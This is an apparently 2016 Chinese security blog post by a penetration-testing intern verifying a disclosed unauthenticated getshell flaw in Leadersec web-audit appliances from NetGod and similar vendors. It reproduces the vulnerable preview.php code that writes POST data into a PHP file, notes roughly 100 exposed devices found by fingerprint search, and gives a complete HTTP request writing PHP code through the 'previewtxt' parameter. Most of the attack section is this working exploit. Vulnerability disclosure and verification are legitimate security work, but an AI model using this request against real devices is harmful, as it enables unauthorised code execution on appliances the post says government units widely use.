Leadersec网上行为(审计)设备系统通用型getshell(无需登录涉及网神&网御星云等厂商)漏洞验证

时间：2016-10-13 03:06:56 阅读：314 评论：0 收藏：0 [点我收藏+]

标签：

收到90的通过邮件。也不是什么大牛级文章，关键是分享下个人思路，可以试着投稿。现在国内的最好安全论坛不外乎乌云zone t00ls 以及九零了，由于某种原因，wooyun暂时关闭，t00ls暂时不开放注册，剩下九零还是可以给管理员投稿注册。ps：希望国内的安全环境能够变好，也希望大家也能够和大牛们一起学习，爬出这个坑

您好，感谢您对九零的支持，恭喜您，您的文章通过审核。

由于论坛现在关闭注册，请您直接回复您所要注册的账号、邮箱。
由管理直接给您创建账号。

目前大四，wooyun小白id是adislj，是一名渗透测试的实习生。之前开放注册的时候我朋友注册了90，但是现在不让注册了找了问了下投稿邮箱试着投稿希望进来和大家一起学习交流。不知道要怎么投稿，如果有不妥可以重新改正。根据指纹信息整合了一下关键字leadersec。涉及大概公网有100多台设备，以下是验证的一个案例，打码了

技术分享

8443端口，协议https。打开https://xxx.xxx.xxx.xxx:8443，输入帐号post过去在这里抓包。

技术分享

这个是漏洞信息

缺陷编号： WooYun-2016-171016
漏洞标题： 某网上行为(审计)设备系统通用型getshell(无需登录涉及网神&网御星云等厂商)
相关厂商： 网神信息技术(北京)股份有限公司
漏洞作者： Ano_Tom认证白帽子
提交时间： 2016-01-19 09:14
公开时间： 2016-04-11 16:08
漏洞类型： 网络未授权访问
危害等级： 高
自评Rank： 20
漏洞状态： 厂商已经确认
漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 help@wooyun.org
Tags标签： 任意命令执行

根目录下preview.php文件具有任意内容写入的漏洞（这个应该是白盒审计出来的），可以直接写入shell。这个系统政府单位用的比较多

code 区域

if(isset($_POST[‘previewtxt‘]))  //这里接受post数据

	{

		$index = $_POST[‘previewtxt‘];

		$index = str_replace("&lt;","<",$index);

		$index = str_replace("&gt;",">",$index);

		$index = stripslashes($index);

		

		$fp = fopen("/usr/hddocs/nsg/template/___index.php","w"); //保存在这里

		fwrite($fp,$index);

		fclose($fp);

		require_once("/usr/hddocs/nsg/head_index.php");

		require_once("/usr/hddocs/nsg/template/___index.php");

	}

写入的文件地址为template/___index.php

漏洞证明：

网神科技的设备

code 区域

网神

POST /preview.php HTTP/1.1 

Host: **.**.**.**:8443

User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:39.0) Gecko/20100101 Firefox/39.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Cookie: PHPSESSID=8b7bf4198d6bccbe7d68fedf3f8287cc

Connection: keep-alive

Content-Type: application/x-www-form-urlencoded

Content-Length: 14

previewtxt=<?php phpinfo();?>

post数据包修改

技术分享
利用这个页面preview.php 的参数previewtxt写入phpinfo